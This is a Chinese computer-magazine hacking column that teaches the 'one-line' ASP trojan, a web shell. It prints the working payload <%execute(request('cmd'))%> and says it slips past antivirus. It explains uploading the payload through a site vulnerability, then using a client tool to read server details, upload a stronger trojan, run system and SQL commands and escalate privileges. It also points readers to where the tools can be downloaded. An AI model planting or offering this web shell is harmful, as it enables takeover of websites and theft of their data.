黑客营 (26)
安全阵线
ASP木马是木马的一个重要分支,它是黑客入侵网站的重要帮手之一。黑客是如何玩ASP木马的呢?本系列不可错过。
代码少 不等于威力小
上期我们介绍了黑客免杀ASP木马的方法,但有个矛盾无法解决,那就是ASP木马功能越多,相应的代码就越多,被杀毒软件查杀的概率就越高。在这种情况下,国内的黑客高手编写了最少代码的ASP木马,整个ASP木马只有“一句话”,区区20多个字符,就能完成全能型ASP木马才能完成的工作,它是黑客入侵ASP网站的终极武器。
这个ASP木马全称为“lanker微型PHP+ASP管理器”,在黑客界俗称为“一句话”木马,采用了C/S结构。“一句话”只是木马的服务端,功能操作则需要相应的客户端配合完成。
首先,黑客需要将“一句话”木马的服务端通过网站漏洞提交到网站目录中,服务端代码如下:“<%execute(request("cmd"))%>”(其中“cmd”是连接密码),保存为任意文件名的文件(由于代码极为精简,因此该木马可以躲过杀毒软件的查杀)。
上传成功后,运行“一句话”木马的客户端程序,在“木马地址”中填入服务端所在的网址,例如http://www.***.com/muma.asp,然后在左侧的“基本功能列表”中就能使用相应的命令控制服务端,例如想获取服务器的信息,那么在“基本功能列表”中选择“环境变量”,点击“提交”按钮,在右侧就会显示服务器的相关信息了,例如服务器的IP地址、端口、物理路径等(图1)。
很多黑客将“一句话”木马作为跳板,用它控制网站后再上传一个功能更为强大的ASP木马。在“基本功能列表”中选择“上传文件”,然后选择木马点击“提交”按钮即可(图2)。
文中提到的黑客工具可以在网上下载,如果你没有找到,可以登录http://go.icpcw.com/g/hky.htm寻找相关信息。此外,我们还在电脑报官方论坛(http://bbs.icpcw.com)安全板块中,邀请“黑客营”的高手坐镇答疑,如果你遇到不懂的黑客知识或者在黑客工具使用过程中有什么疑问,可以寻求他们的帮助。
小贴士 | TIPS
“一句话”木马除了基本的文件操作外,还支持系统命令和SQL命令,系统命令可以方便黑客进行提权,而SQL命令则可以对网站的数据库进行操作。